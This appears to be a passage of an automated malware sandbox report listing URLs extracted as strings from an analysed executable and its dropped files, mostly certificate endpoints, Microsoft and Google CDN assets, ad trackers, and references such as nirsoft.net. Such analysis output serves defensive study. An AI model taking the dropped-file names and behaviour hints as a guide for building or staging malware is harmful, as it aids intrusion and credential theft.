Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0P
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: xldl.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.0.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.0.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: aOn5CfTiwS.exe, 00000000.00000003.226749595.00000000022AA000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplay
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.0.dr	String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.0.dr	String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: xldl.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: xldl.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: xldl.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html8
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.htmlMT
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://www.msn.com
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://www.msn.com/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecv71A3.tmp.1.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1612058829275.exe, 00000001.00000002.224509570.0000000000198000.00000004.00000010.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 1612058829275.exe.0.dr	String found in binary or memory: http://www.nirsoft.net/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, download_engine.dll.0.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, download_engine.dll.0.dr	String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: aOn5CfTiwS.exe	String found in binary or memory: http://www.synametrics.com
Source: download_engine.dll.0.dr	String found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.0.dr	String found in binary or memory: http://www.xunlei.com/GET
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	String found in binary or memory: https://charlesproxy.com/ssl1
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://contextual.media.net/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://pki.goog/repository/0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc
Source: aOn5CfTiwS.exe	String found in binary or memory: https://static.nc-img.com/pp/nc-ui-global
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/mainLegacy.bb0357e72b1f882521990fd54c3c08d1.css
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-300-webfont.96dd56ebb50aa0150f6630360d8d69cf
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-500-webfont.5d9883d92e2eaa724e4e6beb0ef6728a
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-700-webfont.b125dc012841fa8a23b98c37499ca5e8
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd.js
Source: aOn5CfTiwS.exe	String found in binary or memory: https://static.nc-img.com/uiraa/app.ab29bfd164428d10f
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/uiraa/app.ab29bfd164428d10f32bc34df1cad4ed.css
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/uiraa/libs/polyfills_469970f8ffedace1b5b8
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	String found in binary or memory: https://static.nc-img.com/uiraa/libs/vendors_70ac76496c2b0e5ed06c
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.216545630.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.
Source: aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.216627184.0000000002DF6000.00000004.00000040.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.216545630.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flashc
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.216590880.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime%
Source: aOn5CfTiwS.exe, 00000000.00000003.216590880.00000000022A1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwaveltG
